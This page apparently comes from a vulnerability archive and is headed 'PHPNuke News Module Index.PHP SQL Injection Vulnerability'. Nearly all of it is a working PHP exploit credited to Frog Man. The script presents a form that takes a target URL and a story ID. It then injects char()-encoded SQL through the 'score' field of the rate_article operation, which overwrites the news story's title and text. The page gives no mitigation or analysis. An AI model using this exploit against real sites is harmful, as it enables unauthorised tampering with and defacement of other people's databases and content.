|
|
PHPNuke News Module Index.PHP SQL Injection Vulnerability
The following exploit information was provided by Frog Man <leseulfrog@hotmail.com>: If magic_quotes_gpc=OFF or ON <html> <head> <title>PHP-Nuke Change News</title> </head> <body> <? function ascii_phpnuke_exploit($str) { for ($i=0;$i < strlen($str);$i++) { if ($i == strlen($str)-1){ $ascii_char.=ord(substr($str,$i)); }else{ $ascii_char.=ord(substr($str,$i)).','; } } return $ascii_char; } if (isset($submit)) { $score="1"; if (isset($title)) { $score.=", title=char(".ascii_phpnuke_exploit($title).")"; } if (strlen($hometext)>1) { $score.=", hometext=char(".ascii_phpnuke_exploit($hometext).")"; } if (strlen($bodytext)>1){ $score.=", bodytext=char(".ascii_phpnuke_exploit($bodytext).")"; } ?> <b>Target URL : </b><? echo $target; ?><br><br> <b>SID : </b><? echo $sid; ?><br><br> <b>New Title : </b><? echo $title; ?><br><br> <b>New Story Text : </b><? echo $hometext; ?><br><br> <b>New Extended Text : </b><? echo $bodytext; ?><br><br> <form method="POST" action="<? echo $target; ?>/modules.php"> <input type="hidden" name="name" value="News"> <input type="hidden" name="op" value="rate_article"> <input type="hidden" name="sid" value="<? echo $sid; ?>"> <input type="hidden" name="score" value="<? echo $score; ?>"> <input type="submit" name="submit" value="Change the News"> </form> <input type="submit" value="Back" onclick="history.go(-1)"> <? }else{ ?> <form method="GET" action="<? echo $PHP_SELF; ?>"> Target URL : <input type="text" name="target"><br> News SID : <input type="text" name="sid"><br><br> <b>New Title :</b><br> <input type="text" name="title"><br> <br><br><b>New Story Text :</b><br><textarea cols="50" rows="12" name="hometext"></textarea> <br><br><br><b>New Extended Text : </b><br><textarea cols="50" rows="12" name="bodytext"></textarea><br><br> <input type="submit" name="submit" value="Preview"> </form> <? } ?> </body> </html> |
|
Privacy Statement |